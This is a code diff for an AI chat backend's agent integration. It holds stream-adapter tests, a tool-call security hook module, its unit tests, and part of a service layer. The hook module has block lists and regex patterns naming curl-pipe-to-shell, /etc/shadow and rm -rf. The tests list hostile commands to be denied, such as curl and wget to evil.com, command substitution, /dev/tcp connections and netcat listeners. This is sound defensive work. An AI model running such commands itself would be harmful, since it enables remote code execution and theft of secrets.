assert results[0].output == "line1line2"
assert isinstance(results[1], StreamFinishStep)
def test_string_user_message_ignored():
"""A plain string UserMessage (not tool results) produces no output."""
adapter = _adapter()
results = adapter.convert_message(UserMessage(content="hello"))
assert results == []
# -- ResultMessage -----------------------------------------------------------
def test_result_success_emits_finish_step_and_finish():
adapter = _adapter()
# Start some text first (opens step)
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="done")], model="test")
)
msg = ResultMessage(
subtype="success",
duration_ms=100,
duration_api_ms=50,
is_error=False,
num_turns=1,
session_id="s1",
)
results = adapter.convert_message(msg)
# TextEnd + FinishStep + StreamFinish
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamFinishStep)
assert isinstance(results[2], StreamFinish)
def test_result_error_emits_error_and_finish():
adapter = _adapter()
msg = ResultMessage(
subtype="error",
duration_ms=100,
duration_api_ms=50,
is_error=True,
num_turns=0,
session_id="s1",
result="API rate limited",
)
results = adapter.convert_message(msg)
# No step was open, so no FinishStep — just Error + Finish
assert len(results) == 2
assert isinstance(results[0], StreamError)
assert "API rate limited" in results[0].errorText
assert isinstance(results[1], StreamFinish)
# -- Text after tools (new block ID) ----------------------------------------
def test_text_after_tool_gets_new_block_id():
adapter = _adapter()
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="before")], model="test")
)
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
# Send tool result (closes step)
adapter.convert_message(
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
)
results = adapter.convert_message(
AssistantMessage(content=[TextBlock(text="after")], model="test")
)
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "after"
# -- Full conversation flow --------------------------------------------------
def test_full_conversation_flow():
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
adapter = _adapter()
all_responses: list[StreamBaseResponse] = []
# 1. Init
all_responses.extend(
adapter.convert_message(SystemMessage(subtype="init", data={}))
)
# 2. Assistant text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
)
)
# 3. Tool use
all_responses.extend(
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(
id="t1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"query": "email"},
)
],
model="test",
)
)
)
# 4. Tool result
all_responses.extend(
adapter.convert_message(
UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
)
)
)
# 5. More text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
)
)
# 6. Result
all_responses.extend(
adapter.convert_message(
ResultMessage(
subtype="success",
duration_ms=500,
duration_api_ms=400,
is_error=False,
num_turns=2,
session_id="s1",
)
)
)
types = [type(r).__name__ for r in all_responses]
assert types == [
"StreamStart",
"StreamStartStep", # step 1: text + tool call
"StreamTextStart",
"StreamTextDelta", # "Let me search"
"StreamTextEnd", # closed before tool
"StreamToolInputStart",
"StreamToolInputAvailable",
"StreamToolOutputAvailable", # tool result
"StreamFinishStep", # step 1 closed after tool result
"StreamStartStep", # step 2: continuation text
"StreamTextStart", # new block after tool
"StreamTextDelta", # "I found 2"
"StreamTextEnd", # closed by result
"StreamFinishStep", # step 2 closed
"StreamFinish",
]


@@ -0,0 +1,393 @@
"""Security hooks for Claude Agent SDK integration.
This module provides security hooks that validate tool calls before execution,
ensuring multi-user isolation and preventing unauthorized operations.
"""
import json
import logging
import os
import re
import shlex
from typing import Any, cast
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
logger = logging.getLogger(__name__)
# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
"bash",
"shell",
"exec",
"terminal",
"command",
}
# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
# JSON / structured data
"jq",
# Text processing
"grep",
"egrep",
"fgrep",
"rg",
"head",
"tail",
"cat",
"wc",
"sort",
"uniq",
"cut",
"tr",
"sed",
"awk",
"column",
"fold",
"fmt",
"nl",
"paste",
"rev",
# File inspection (read-only)
"find",
"ls",
"file",
"stat",
"du",
"tree",
"basename",
"dirname",
"realpath",
# Utilities
"echo",
"printf",
"date",
"true",
"false",
"xargs",
"tee",
# Comparison / encoding
"diff",
"comm",
"base64",
"md5sum",
"sha256sum",
}
# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}
# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
r"sudo",
r"rm\s+-rf",
r"dd\s+if=",
r"/etc/passwd",
r"/etc/shadow",
r"chmod\s+777",
r"curl\s+.*\|.*sh",
r"wget\s+.*\|.*sh",
r"eval\s*\(",
r"exec\s*\(",
r"__import__",
r"os\.system",
r"subprocess",
]
def _deny(reason: str) -> dict[str, Any]:
"""Return a hook denial response."""
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": reason,
}
}
def _validate_workspace_path(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate that a workspace-scoped tool only accesses allowed paths.
Allowed directories:
- The SDK working directory (``/tmp/copilot-<session>/``)
- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
"""
path = tool_input.get("file_path") or tool_input.get("path") or ""
if not path:
# Glob/Grep without a path default to cwd which is already sandboxed
return {}
resolved = os.path.normpath(os.path.expanduser(path))
# Allow access within the SDK working directory
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
return {}
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
return {}
logger.warning(
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
)
return _deny(
f"Tool '{tool_name}' can only access files within the workspace directory."
)
def _validate_bash_command(
tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate a Bash command against the allowlist of safe commands.
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
Blocks command substitution, output redirection, and disallowed executables.
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
containing ``|`` won't be mistaken for shell pipes).
"""
command = tool_input.get("command", "")
if not command or not isinstance(command, str):
return _deny("Bash command is empty.")
# Block command substitution — can smuggle arbitrary commands
if "$(" in command or "`" in command:
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
# Block output redirection — Bash should be read-only
if re.search(r"(?<!\d)>{1,2}\s", command):
return _deny("Output redirection (> or >>) is not allowed in Bash.")
# Block /dev/ access (e.g., /dev/tcp for network)
if "/dev/" in command:
return _deny("Access to /dev/ is not allowed in Bash.")
    # Tokenize with shlex (respects quotes), then extract command names.
    # shlex.split keeps whitespace-separated shell operators (| ; && ||) as
    # their own tokens, while operators inside quoted strings stay part of
    # the surrounding token.
try:
tokens = shlex.split(command)
except ValueError:
return _deny("Malformed command (unmatched quotes).")
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
expect_command = True
for token in tokens:
if token in ("|", "||", "&&", ";"):
expect_command = True
continue
if expect_command:
# Skip env var assignments (VAR=value)
if "=" in token and not token.startswith("-"):
continue
cmd_name = os.path.basename(token)
if cmd_name not in ALLOWED_BASH_COMMANDS:
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
logger.warning(f"Blocked Bash command: {cmd_name}")
return _deny(
f"Command '{cmd_name}' is not allowed. "
f"Allowed commands: {allowed}"
)
expect_command = False
# Validate absolute file paths stay within workspace
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
for token in tokens:
if not token.startswith("/"):
continue
resolved = os.path.normpath(token)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
continue
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
continue
logger.warning(f"Blocked Bash path outside workspace: {token}")
return _deny(
f"Bash can only access files within the workspace directory. "
f"Path '{token}' is outside the workspace."
)
return {}
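# Worked example of the tokenization this validator relies on (standard-library
# shlex only; the commands shown are illustrative):
#   shlex.split("jq '.blocks[] | .id' result.json")
#     -> ['jq', '.blocks[] | .id', 'result.json']         # quoted '|' stays in one token
#   shlex.split("cat file.txt | grep -i error")
#     -> ['cat', 'file.txt', '|', 'grep', '-i', 'error']   # bare '|' means 'grep' is
#                                                          # checked against the allowlist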
def _validate_tool_access(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Validate that a tool call is allowed.
Returns:
Empty dict to allow, or dict with hookSpecificOutput to deny
"""
# Block forbidden tools
if tool_name in BLOCKED_TOOLS:
logger.warning(f"Blocked tool access attempt: {tool_name}")
return _deny(
f"Tool '{tool_name}' is not available. "
"Use the CoPilot-specific tools instead."
)
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
if tool_name in SANDBOXED_BASH_TOOLS:
return _validate_bash_command(tool_input, sdk_cwd)
# Workspace-scoped tools: allowed only within the SDK workspace directory
if tool_name in WORKSPACE_SCOPED_TOOLS:
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
# Check for dangerous patterns in tool input
# Use json.dumps for predictable format (str() produces Python repr)
input_str = json.dumps(tool_input) if tool_input else ""
for pattern in DANGEROUS_PATTERNS:
if re.search(pattern, input_str, re.IGNORECASE):
logger.warning(
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
)
return _deny("Input contains blocked pattern")
return {}
def _validate_user_isolation(
tool_name: str, tool_input: dict[str, Any], user_id: str | None
) -> dict[str, Any]:
"""Validate that tool calls respect user isolation."""
# For workspace file tools, ensure path doesn't escape
if "workspace" in tool_name.lower():
path = tool_input.get("path", "") or tool_input.get("file_path", "")
if path:
# Check for path traversal
if ".." in path or path.startswith("/"):
logger.warning(
f"Blocked path traversal attempt: {path} by user {user_id}"
)
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": "Path traversal not allowed",
}
}
return {}
def create_security_hooks(
user_id: str | None, sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Create the security hooks configuration for Claude Agent SDK.
Includes security validation and observability hooks:
- PreToolUse: Security validation before tool execution
- PostToolUse: Log successful tool executions
- PostToolUseFailure: Log and handle failed tool executions
- PreCompact: Log context compaction events (SDK handles compaction automatically)
Args:
user_id: Current user ID for isolation validation
sdk_cwd: SDK working directory for workspace-scoped tool validation
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def pre_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Combined pre-tool-use validation hook."""
_ = context # unused but required by signature
tool_name = cast(str, input_data.get("tool_name", ""))
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
# Strip MCP prefix for consistent validation
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
# Only block non-CoPilot tools; our MCP-registered tools
# (including Read for oversized results) are already sandboxed.
if not is_copilot_tool:
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
if result:
return cast(SyncHookJSONOutput, result)
# Validate user isolation
result = _validate_user_isolation(clean_name, tool_input, user_id)
if result:
return cast(SyncHookJSONOutput, result)
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log successful tool executions for observability."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_failure_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log failed tool executions for debugging."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
error = input_data.get("error", "Unknown error")
logger.warning(
f"[SDK] Tool failed: {tool_name}, error={error}, "
f"user={user_id}, tool_use_id={tool_use_id}"
)
return cast(SyncHookJSONOutput, {})
async def pre_compact_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log when SDK triggers context compaction.
The SDK automatically compacts conversation history when it grows too large.
This hook provides visibility into when compaction happens.
"""
_ = context, tool_use_id
trigger = input_data.get("trigger", "auto")
logger.info(
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
)
return cast(SyncHookJSONOutput, {})
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
],
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
}
except ImportError:
# Fallback for when SDK isn't available - return empty hooks
logger.warning("claude-agent-sdk not available, security hooks disabled")
return {}


@@ -0,0 +1,258 @@
"""Unit tests for SDK security hooks."""
import os
from .security_hooks import _validate_tool_access, _validate_user_isolation
SDK_CWD = "/tmp/copilot-abc123"
def _is_denied(result: dict) -> bool:
hook = result.get("hookSpecificOutput", {})
return hook.get("permissionDecision") == "deny"
# -- Blocked tools -----------------------------------------------------------
def test_blocked_tools_denied():
for tool in ("bash", "shell", "exec", "terminal", "command"):
result = _validate_tool_access(tool, {})
assert _is_denied(result), f"{tool} should be blocked"
def test_unknown_tool_allowed():
result = _validate_tool_access("SomeCustomTool", {})
assert result == {}
# -- Workspace-scoped tools --------------------------------------------------
def test_read_within_workspace_allowed():
result = _validate_tool_access(
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_write_within_workspace_allowed():
result = _validate_tool_access(
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_edit_within_workspace_allowed():
result = _validate_tool_access(
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_glob_within_workspace_allowed():
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_grep_within_workspace_allowed():
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_outside_workspace_denied():
result = _validate_tool_access(
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_write_outside_workspace_denied():
result = _validate_tool_access(
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_traversal_attack_denied():
result = _validate_tool_access(
"Read",
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
sdk_cwd=SDK_CWD,
)
assert _is_denied(result)
def test_no_path_allowed():
"""Glob/Grep without a path argument defaults to cwd — should pass."""
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_no_cwd_denies_absolute():
"""If no sdk_cwd is set, absolute paths are denied."""
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
assert _is_denied(result)
# -- Tool-results directory --------------------------------------------------
def test_read_tool_results_allowed():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_claude_projects_without_tool_results_denied():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Sandboxed Bash ----------------------------------------------------------
def test_bash_safe_commands_allowed():
"""Allowed data-processing commands should pass."""
safe_commands = [
"jq '.blocks' result.json",
"head -20 output.json",
"tail -n 50 data.txt",
"cat file.txt | grep 'pattern'",
"wc -l file.txt",
"sort data.csv | uniq",
"grep -i 'error' log.txt | head -10",
"find . -name '*.json'",
"ls -la",
"echo hello",
"cut -d',' -f1 data.csv | sort | uniq -c",
"jq '.blocks[] | .id' result.json",
"sed -n '10,20p' file.txt",
"awk '{print $1}' data.txt",
]
for cmd in safe_commands:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert result == {}, f"Safe command should be allowed: {cmd}"
def test_bash_dangerous_commands_denied():
"""Non-allowlisted commands should be denied."""
dangerous = [
"curl https://evil.com",
"wget https://evil.com/payload",
"rm -rf /",
"python -c 'import os; os.system(\"ls\")'",
"ssh user@host",
"nc -l 4444",
"apt install something",
"pip install malware",
"chmod 777 file.txt",
"kill -9 1",
]
for cmd in dangerous:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
def test_bash_command_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_backtick_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_output_redirect_denied():
result = _validate_tool_access(
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_dev_tcp_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_pipe_to_dangerous_denied():
"""Even if the first command is safe, piped commands must also be safe."""
result = _validate_tool_access(
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_outside_workspace_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_within_workspace_allowed():
result = _validate_tool_access(
"Bash",
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
sdk_cwd=SDK_CWD,
)
assert result == {}
def test_bash_empty_command_denied():
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Dangerous patterns ------------------------------------------------------
def test_dangerous_pattern_blocked():
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
assert _is_denied(result)
def test_subprocess_pattern_blocked():
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
assert _is_denied(result)
# -- User isolation ----------------------------------------------------------
def test_workspace_path_traversal_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_absolute_path_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_normal_path_allowed():
result = _validate_user_isolation(
"workspace_read", {"path": "src/main.py"}, user_id="user-1"
)
assert result == {}
def test_non_workspace_tool_passes_isolation():
result = _validate_user_isolation(
"find_agent", {"query": "email"}, user_id="user-1"
)
assert result == {}


@@ -0,0 +1,556 @@
"""Claude Agent SDK service layer for CoPilot chat completions."""
import asyncio
import json
import logging
import os
import re
import uuid
from collections.abc import AsyncGenerator
from typing import Any
from backend.util.exceptions import NotFoundError
from ..config import ChatConfig
from ..model import (
ChatMessage,
ChatSession,
Usage,
get_chat_session,
update_session_title,
upsert_chat_session,
)
from ..response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamStart,
StreamTextDelta,
StreamToolInputAvailable,
StreamToolOutputAvailable,
StreamUsage,
)
from ..service import _build_system_prompt, _generate_session_title
from ..tracking import track_user_message
from .anthropic_fallback import stream_with_anthropic
from .response_adapter import SDKResponseAdapter
from .security_hooks import create_security_hooks
from .tool_adapter import (
COPILOT_TOOL_NAMES,
create_copilot_mcp_server,
set_execution_context,
)
from .tracing import TracedSession, create_tracing_hooks, merge_hooks
logger = logging.getLogger(__name__)
config = ChatConfig()
# Set to hold background tasks to prevent garbage collection
_background_tasks: set[asyncio.Task[Any]] = set()
_SDK_CWD_PREFIX = "/tmp/copilot-"
# Appended to the system prompt to inform the agent about Bash restrictions.
# The SDK already describes each tool (Read, Write, Edit, Glob, Grep, Bash),
# but it doesn't know about our security hooks' command allowlist for Bash.
_SDK_TOOL_SUPPLEMENT = """
## Bash restrictions
The Bash tool is restricted to safe, read-only data-processing commands:
jq, grep, head, tail, cat, wc, sort, uniq, cut, tr, sed, awk, find, ls,
echo, diff, base64, and similar utilities.
Network commands (curl, wget), destructive commands (rm, chmod), and
interpreters (python, node) are NOT available.
"""
def _resolve_sdk_model() -> str | None:
"""Resolve the model name for the Claude Agent SDK CLI.
Uses ``config.claude_agent_model`` if set, otherwise derives from
``config.model`` by stripping the OpenRouter provider prefix (e.g.,
``"anthropic/claude-opus-4.6"`` → ``"claude-opus-4.6"``).
"""
if config.claude_agent_model:
return config.claude_agent_model
model = config.model
if "/" in model:
return model.split("/", 1)[1]
return model
def _build_sdk_env() -> dict[str, str]:
"""Build env vars for the SDK CLI process.
Routes API calls through OpenRouter (or a custom base_url) using
the same ``config.api_key`` / ``config.base_url`` as the non-SDK path.
This gives per-call token and cost tracking on the OpenRouter dashboard.
Only overrides ``ANTHROPIC_API_KEY`` when a valid proxy URL and auth
token are both present — otherwise returns an empty dict so the SDK
falls back to its default credentials.
"""
env: dict[str, str] = {}
if config.api_key and config.base_url:
# Strip /v1 suffix — SDK expects the base URL without a version path
base = config.base_url.rstrip("/")
if base.endswith("/v1"):
base = base[:-3]
if not base or not base.startswith("http"):
# Invalid base_url — don't override SDK defaults
return env
env["ANTHROPIC_BASE_URL"] = base
env["ANTHROPIC_AUTH_TOKEN"] = config.api_key
# Must be explicitly empty so the CLI uses AUTH_TOKEN instead
env["ANTHROPIC_API_KEY"] = ""
return env
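# Worked example (values are hypothetical): with base_url "https://openrouter.ai/api/v1"
# and api_key "sk-or-...", the returned mapping is
#   {"ANTHROPIC_BASE_URL": "https://openrouter.ai/api",
#    "ANTHROPIC_AUTH_TOKEN": "sk-or-...",
#    "ANTHROPIC_API_KEY": ""}
# If either value is missing, or the base URL does not start with "http", the
# result is {} and the SDK CLI keeps its default credentials.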
def _make_sdk_cwd(session_id: str) -> str:
"""Create a safe, session-specific working directory path.
Sanitizes session_id, then validates the resulting path stays under /tmp/
using normpath + startswith (the pattern CodeQL recognises as a sanitizer).
"""
# Step 1: Sanitize - only allow alphanumeric and hyphens
safe_id = re.sub(r"[^A-Za-z0-9-]", "", session_id)
if not safe_id:
raise ValueError("Session ID is empty after sanitization")
# Step 2: Construct path with known-safe prefix
cwd = os.path.normpath(f"{_SDK_CWD_PREFIX}{safe_id}")
# Step 3: Validate the path is still under our prefix (prevent traversal)
if not cwd.startswith(_SDK_CWD_PREFIX):
raise ValueError(f"Session path escaped prefix: {cwd}")
# Step 4: Additional assertion for defense-in-depth
assert cwd.startswith("/tmp/copilot-"), f"Path validation failed: {cwd}"
return cwd
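# Worked examples: _make_sdk_cwd("abc-123") -> "/tmp/copilot-abc-123";
# _make_sdk_cwd("../../etc") -> "/tmp/copilot-etc" (dots and slashes are stripped
# by the sanitizer); _make_sdk_cwd("!!!") raises ValueError because nothing
# survives sanitization.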
def _cleanup_sdk_tool_results(cwd: str) -> None:
"""Remove SDK tool-result files for a specific session working directory.
The SDK creates tool-result files under ~/.claude/projects/<encoded-cwd>/tool-results/.
We clean only the specific cwd's results to avoid race conditions between
concurrent sessions.
Security: cwd MUST be created by _make_sdk_cwd() which sanitizes session_id.
"""
import shutil
# Security check 1: Validate cwd is under the expected prefix
normalized = os.path.normpath(cwd)
if not normalized.startswith(_SDK_CWD_PREFIX):
logger.warning(f"[SDK] Rejecting cleanup for invalid path: {cwd}")
return
# Security check 2: Ensure no path traversal in the normalized path
if ".." in normalized:
logger.warning(f"[SDK] Rejecting cleanup for traversal attempt: {cwd}")
return
# SDK encodes the cwd path by replacing '/' with '-'
encoded_cwd = normalized.replace("/", "-")
# Construct the project directory path (known-safe home expansion)
claude_projects = os.path.expanduser("~/.claude/projects")
project_dir = os.path.join(claude_projects, encoded_cwd)
# Security check 3: Validate project_dir is under ~/.claude/projects
project_dir = os.path.normpath(project_dir)
if not project_dir.startswith(claude_projects):
logger.warning(
f"[SDK] Rejecting cleanup for escaped project path: {project_dir}"
)
return
results_dir = os.path.join(project_dir, "tool-results")
if os.path.isdir(results_dir):
for filename in os.listdir(results_dir):
file_path = os.path.join(results_dir, filename)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except OSError:
pass
# Also clean up the temp cwd directory itself
try:
shutil.rmtree(normalized, ignore_errors=True)
except OSError:
pass
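# Worked example: for cwd "/tmp/copilot-abc123" the SDK-encoded project directory
# is "~/.claude/projects/-tmp-copilot-abc123", so this removes any files under
# ".../tool-results/" there and then deletes "/tmp/copilot-abc123" itself.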
async def _compress_conversation_history(
session: ChatSession,
) -> list[ChatMessage]:
"""Compress prior conversation messages if they exceed the token threshold.
Uses the shared compress_context() from prompt.py which supports:
- LLM summarization of old messages (keeps recent ones intact)
- Progressive content truncation as fallback
- Middle-out deletion as last resort
Returns the compressed prior messages (everything except the current message).
"""
prior = session.messages[:-1]
if len(prior) < 2:
return prior
from backend.util.prompt import compress_context
# Convert ChatMessages to dicts for compress_context
messages_dict = []
for msg in prior:
msg_dict: dict[str, Any] = {"role": msg.role}
if msg.content:
msg_dict["content"] = msg.content
if msg.tool_calls:
msg_dict["tool_calls"] = msg.tool_calls
if msg.tool_call_id:
msg_dict["tool_call_id"] = msg.tool_call_id
messages_dict.append(msg_dict)
try:
import openai
async with openai.AsyncOpenAI(
api_key=config.api_key, base_url=config.base_url, timeout=30.0
) as client:
result = await compress_context(
messages=messages_dict,
model=config.model,
client=client,
)
except Exception as e:
logger.warning(f"[SDK] Context compression with LLM failed: {e}")
# Fall back to truncation-only (no LLM summarization)
result = await compress_context(
messages=messages_dict,
model=config.model,
client=None,
)
if result.was_compacted:
logger.info(
f"[SDK] Context compacted: {result.original_token_count} -> "
f"{result.token_count} tokens "
f"({result.messages_summarized} summarized, "
f"{result.messages_dropped} dropped)"
)
# Convert compressed dicts back to ChatMessages
return [
ChatMessage(
role=m["role"],
content=m.get("content"),
tool_calls=m.get("tool_calls"),
tool_call_id=m.get("tool_call_id"),
)
for m in result.messages
]
return prior
def _format_conversation_context(messages: list[ChatMessage]) -> str | None:
"""Format conversation messages into a context prefix for the user message.
Returns a string like:
<conversation_history>
User: hello
You responded: Hi! How can I help?
</conversation_history>
Returns None if there are no messages to format.
"""
if not messages:
return None
lines: list[str] = []
for msg in messages:
if not msg.content:
continue
if msg.role == "user":
lines.append(f"User: {msg.content}")
elif msg.role == "assistant":
lines.append(f"You responded: {msg.content}")
# Skip tool messages — they're internal details
if not lines:
return None
return "<conversation_history>\n" + "\n".join(lines) + "\n</conversation_history>"
async def stream_chat_completion_sdk(
session_id: str,
message: str | None = None,
tool_call_response: str | None = None, # noqa: ARG001
is_user_message: bool = True,
user_id: str | None = None,
retry_count: int = 0, # noqa: ARG001
session: ChatSession | None = None,
context: dict[str, str] | None = None, # noqa: ARG001
) -> AsyncGenerator[StreamBaseResponse, None]:
"""Stream chat completion using Claude Agent SDK.
Drop-in replacement for stream_chat_completion with improved reliability.
"""
if session is None:
session = await get_chat_session(session_id, user_id)
if not session:
raise NotFoundError(
f"Session {session_id} not found. Please create a new session first."
)
if message:
session.messages.append(
ChatMessage(
role="user" if is_user_message else "assistant", content=message
)
)
if is_user_message:
track_user_message(
user_id=user_id, session_id=session_id, message_length=len(message)
)
session = await upsert_chat_session(session)
# Generate title for new sessions (first user message)
if is_user_message and not session.title:
user_messages = [m for m in session.messages if m.role == "user"]
if len(user_messages) == 1:
first_message = user_messages[0].content or message or ""
if first_message:
task = asyncio.create_task(
_update_title_async(session_id, first_message, user_id)
)
_background_tasks.add(task)
task.add_done_callback(_background_tasks.discard)
# Build system prompt (reuses non-SDK path with Langfuse support)
has_history = len(session.messages) > 1
system_prompt, _ = await _build_system_prompt(
user_id, has_conversation_history=has_history
)
system_prompt += _SDK_TOOL_SUPPLEMENT
message_id = str(uuid.uuid4())
text_block_id = str(uuid.uuid4())
task_id = str(uuid.uuid4())
yield StreamStart(messageId=message_id, taskId=task_id)
stream_completed = False
# Use a session-specific temp dir to avoid cleanup race conditions
# between concurrent sessions.
sdk_cwd = _make_sdk_cwd(session_id)
os.makedirs(sdk_cwd, exist_ok=True)
set_execution_context(user_id, session, None)
try:
try:
from claude_agent_sdk import ClaudeAgentOptions, ClaudeSDKClient
mcp_server = create_copilot_mcp_server()
sdk_model = _resolve_sdk_model()
# Initialize Langfuse tracing (no-op if not configured)
tracer = TracedSession(session_id, user_id, system_prompt, model=sdk_model)
